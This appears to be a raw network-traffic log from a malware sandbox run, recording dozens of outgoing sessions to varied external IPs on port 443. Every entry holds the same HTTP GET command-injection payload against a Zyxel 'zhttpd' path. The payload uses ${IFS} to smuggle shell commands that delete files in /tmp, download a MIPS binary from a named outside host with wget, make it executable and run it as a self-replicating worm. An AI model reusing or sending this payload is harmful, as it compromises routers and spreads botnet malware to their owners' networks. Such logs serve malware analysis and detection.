                                        Jan 14, 2024 16:18:44.454943895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4289192.168.2.1358832170.4.36.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454994917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4290192.168.2.133760840.99.154.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455049992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4291192.168.2.134806218.93.112.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455099106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4292192.168.2.1336138205.220.203.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455154896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4293192.168.2.135809040.160.211.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455198050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4294192.168.2.1352760166.17.34.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455265999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4295192.168.2.1340872168.146.102.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455332041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4296192.168.2.134028042.101.228.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455377102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4297192.168.2.135809466.219.85.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455411911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4298192.168.2.1337248217.185.182.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455480099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4299192.168.2.133307024.226.115.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455538988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4300192.168.2.1340132165.27.68.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455599070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4301192.168.2.1358006104.114.87.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455640078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4302192.168.2.1356380178.89.146.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455710888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4303192.168.2.1346170156.243.182.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455758095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4304192.168.2.134301450.153.76.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455833912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4305192.168.2.1346332154.136.205.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455874920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4306192.168.2.1340494152.187.214.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455914974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4307192.168.2.133960625.35.255.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.455982924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4308192.168.2.1336530212.113.141.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.456037998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4309192.168.2.1333498133.57.229.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.456091881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4310192.168.2.1349156112.210.137.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.456170082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4311192.168.2.1333832176.111.190.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.456223011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4312192.168.2.1355564125.143.56.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.463969946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4313192.168.2.1341084111.78.88.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464011908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4314192.168.2.1349082218.248.97.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464035034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4315192.168.2.134879068.208.57.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464063883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4316192.168.2.133344475.68.172.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464124918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4317192.168.2.1340936183.116.193.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464164019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4318192.168.2.1360454118.227.15.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464200020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4319192.168.2.1355512140.37.140.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464221954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4320192.168.2.1356744188.74.94.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464267015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4321192.168.2.1351898213.146.119.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464335918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4322192.168.2.13599148.246.245.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464343071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4323192.168.2.1341270103.74.41.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464375019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4324192.168.2.1345686129.84.201.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464432955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4325192.168.2.133780896.30.131.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464488983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4326192.168.2.1345616113.108.161.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464513063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4327192.168.2.135347618.244.74.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464565039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4328192.168.2.1339454119.74.142.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464593887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4329192.168.2.1355118207.0.248.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464642048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4330192.168.2.1352046143.207.38.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464718103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4331192.168.2.1346578140.170.6.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464734077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4332192.168.2.1340150156.164.167.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464792967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4333192.168.2.1360652181.215.245.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464813948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4334192.168.2.1358084139.226.4.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464839935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4335192.168.2.1349762216.132.208.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464884043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4336192.168.2.135386071.202.156.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464966059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4337192.168.2.1359996185.154.42.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.464996099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4338192.168.2.1342906212.152.15.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465040922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4339192.168.2.1336360108.54.173.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465051889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4340192.168.2.135404491.16.52.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465090036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4341192.168.2.134924871.64.246.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465131044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4342192.168.2.1334278162.80.125.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465169907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4343192.168.2.136018867.0.224.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465173006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4344192.168.2.135898098.162.15.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465235949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4345192.168.2.1344484219.200.73.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465291977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4346192.168.2.133349227.148.130.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465332031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4347192.168.2.1333470146.157.220.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465377092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4348192.168.2.13529604.161.92.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465415001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4349192.168.2.1333702108.100.122.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465440989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4350192.168.2.1339580119.187.171.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465471983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4351192.168.2.1337012189.254.235.149443
                                        TimestampBytes transferredDirectionData
